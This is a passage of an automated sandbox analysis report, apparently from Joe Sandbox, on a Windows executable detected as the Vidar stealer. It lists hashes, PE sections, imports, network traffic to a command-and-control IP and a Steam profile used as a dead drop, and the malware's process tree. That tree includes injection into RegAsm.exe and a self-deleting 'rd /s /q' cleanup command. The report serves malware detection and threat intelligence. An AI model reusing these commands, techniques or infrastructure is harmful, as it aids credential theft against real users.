                    Size (bytes):34771
                    Entropy (8bit):5.384707329935698
                    Encrypted:false
                    SSDEEP:768:Ddpqm+0Ih3YAA9CWGA2fcDAZPzzgiJmDzJtxvrfJkPVoEAdmPzzgiJmDzJtxvJ2i:Dd8m+0Ih3YAA9CWGA2FZPzzgiJmDzJtZ
                    MD5:E1272A5DEF427D3C572F30E33137E66F
                    SHA1:2418DEAEC6C03B7E940B235F5B22DF985BA4E51C
                    SHA-256:2E5105A3078B8C83EEA7F86251F0D56C93C6749A5C9ED44A23D06566E9550C24
                    SHA-512:508997728F401092B15DA2FFD91A5275A3BEA4AC87E30ED5DD24811D1D2F6F76013F2E9B43FC898420BD326C7F86FC42DDA8BAFD7F4B3BA81C68A3FAC694B478
                    Malicious:false
                    Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r8p- https://95.217.240.101|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link hr
                    File type:PE32 executable (console) Intel 80386, for MS Windows
                    Entropy (8bit):7.559890664251954
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:372'224 bytes
                    MD5:75db6dfdebb9bf0d98acfc15f2219c62
                    SHA1:5bc1ceec4269b4e893f2b00c1c4b3c0cb42a3291
                    SHA256:a2f94952c89ea440f82877365db5b4a5cf14a10e4168a22a92fce4a8fd98404f
                    SHA512:b295c110369cb2c56d87aab45ff93961b076474d16ca9a7138ab3e6e7acbc8a13a2949dcbc88e6f2e96e4fae793e1793b3052c7ec390ee3d6cd517029583dd2f
                    SSDEEP:6144:1JhLSp8zWMtAJA0Z9aRlEiw+pVc4Amr7me33k/JNSdiaJIlsZa6n:pLSpmqKRw+84B7mA3aJE4aOAFn
                    TLSH:C384D050B0C08031D663253649E0EBB55E3EF9614F619E9F37A80EBF4F342D2DA61A5B
                    Icon Hash:00928e8e8686b000
                    Entrypoint:0x405cde
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows cui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66476698 [Fri May 17 14:15:52 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:e0b6966096a2c186c5f52fee6a381e0f
                    Instruction
                    call 00007F3884E7D9DBh
                    jmp 00007F3884E7D0A9h
                    mov ecx, dword ptr [ebp-0Ch]
                    mov dword ptr fs:[00000000h], ecx
                    pop ecx
                    pop edi
                    pop edi
                    pop esi
                    pop ebx
                    mov esp, ebp
                    pop ebp
                    push ecx
                    ret
                    mov ecx, dword ptr [ebp-10h]
                    xor ecx, ebp
                    call 00007F3884E7CF95h
                    jmp 00007F3884E7D212h
                    push eax
                    push dword ptr fs:[00000000h]
                    lea eax, dword ptr [esp+0Ch]
                    sub esp, dword ptr [esp+0Ch]
                    push ebx
                    push esi
                    push edi
                    mov dword ptr [eax], ebp
                    mov ebp, eax
                    mov eax, dword ptr [0045A500h]
                    xor eax, ebp
                    push eax
                    push dword ptr [ebp-04h]
                    mov dword ptr [ebp-04h], FFFFFFFFh
                    lea eax, dword ptr [ebp-0Ch]
                    mov dword ptr fs:[00000000h], eax
                    ret
                    push eax
                    push dword ptr fs:[00000000h]
                    lea eax, dword ptr [esp+0Ch]
                    sub esp, dword ptr [esp+0Ch]
                    push ebx
                    push esi
                    push edi
                    mov dword ptr [eax], ebp
                    mov ebp, eax
                    mov eax, dword ptr [0045A500h]
                    xor eax, ebp
                    push eax
                    mov dword ptr [ebp-10h], eax
                    push dword ptr [ebp-04h]
                    mov dword ptr [ebp-04h], FFFFFFFFh
                    lea eax, dword ptr [ebp-0Ch]
                    mov dword ptr fs:[00000000h], eax
                    ret
                    push eax
                    push dword ptr fs:[00000000h]
                    lea eax, dword ptr [esp+0Ch]
                    sub esp, dword ptr [esp+0Ch]
                    push ebx
                    push esi
                    push edi
                    mov dword ptr [eax], ebp
                    mov ebp, eax
                    mov eax, dword ptr [0045A500h]
                    xor eax, ebp
                    push eax
                    mov dword ptr [ebp-10h], esp
                    push dword ptr [ebp-04h]
                    mov dword ptr [ebp-04h], FFFFFFFFh
                    lea eax, dword ptr [ebp-0Ch]
                    mov dword ptr fs:[00000000h], eax
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x26b54 | 0x28 | .rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5d000 | 0x1a54 | .reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x250e8 | 0x1c | .rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x25028 | 0x40 | .rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x1e000 | 0x15c | .rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    .text | 0x1000 | 0x1c59f | 0x1c600 | c974584c4e13e2149107eff417dd9cd3 | False | 0.5786756607929515 | data | 6.607233236723112 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata | 0x1e000 | 0x933e | 0x9400 | f5b90bf6728e730f08e6ae3125e52278 | False | 0.39123205236486486 | data | 4.691228677009398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data | 0x28000 | 0x3433c | 0x33400 | c7f65d0fd90704e9d511f9e8abbc9eb8 | False | 0.9840463033536585 | data | 7.984832613465078 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .reloc | 0x5d000 | 0x1a54 | 0x1c00 | 898c036d1f57c251ff0d1554c59a02d7 | False | 0.7325613839285714 | data | 6.391338335451278 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    DLL | Import
                    KERNEL32.dll | WaitForSingleObject, CreateRemoteThread, VirtualAlloc, FreeConsole, CloseHandle, WaitForSingleObjectEx, GetCurrentThreadId, GetExitCodeThread, QueryPerformanceCounter, ReleaseSRWLockExclusive, WakeAllConditionVariable, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EncodePointer, DecodePointer, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, CreateThread, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, ReadConsoleW, HeapSize, WriteConsoleW
                    May 17, 2024 18:06:02.660206079 CEST4434970895.217.240.101192.168.2.5
                    May 17, 2024 18:06:04.024296999 CEST4434970895.217.240.101192.168.2.5
                    May 17, 2024 18:06:04.024359941 CEST4434970895.217.240.101192.168.2.5
                    May 17, 2024 18:06:04.024411917 CEST49708443192.168.2.595.217.240.101
                    May 17, 2024 18:06:04.024425030 CEST4434970895.217.240.101192.168.2.5
                    May 17, 2024 18:06:04.024454117 CEST49708443192.168.2.595.217.240.101
UDP packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 17, 2024 18:05:50.215388060 CEST | 65439 | 53 | 192.168.2.5 | 1.1.1.1
May 17, 2024 18:05:50.261188984 CEST | 53 | 65439 | 1.1.1.1 | 192.168.2.5

DNS queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 17, 2024 18:05:50.215388060 CEST | 192.168.2.5 | 1.1.1.1 | 0xb9dd | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false

DNS answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 17, 2024 18:05:50.261188984 CEST | 1.1.1.1 | 192.168.2.5 | 0xb9dd | No error (0) | steamcommunity.com | | 104.102.42.29 | A (IP address) | IN (0x0001) | false
                    • steamcommunity.com
                    • 95.217.240.101


                    Target ID:0
                    Start time:12:05:49
                    Start date:17/05/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0xab0000
                    File size:372'224 bytes
                    MD5 hash:75DB6DFDEBB9BF0D98ACFC15F2219C62
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:1
                    Start time:12:05:49
                    Start date:17/05/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:2
                    Start time:12:05:49
                    Start date:17/05/2024
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Imagebase:0x8c0000
                    File size:65'440 bytes
                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:true

                    Target ID:7
                    Start time:12:06:58
                    Start date:17/05/2024
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCGCGDHJEGHJ" & exit
                    Imagebase:0x790000
                    File size:236'544 bytes
                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:8
                    Start time:12:06:58
                    Start date:17/05/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:9
                    Start time:12:06:58
                    Start date:17/05/2024
                    Path:C:\Windows\SysWOW64\timeout.exe
                    Wow64 process (32bit):true
                    Commandline:timeout /t 10
                    Imagebase:0x1f0000
                    File size:25'088 bytes
                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    No disassembly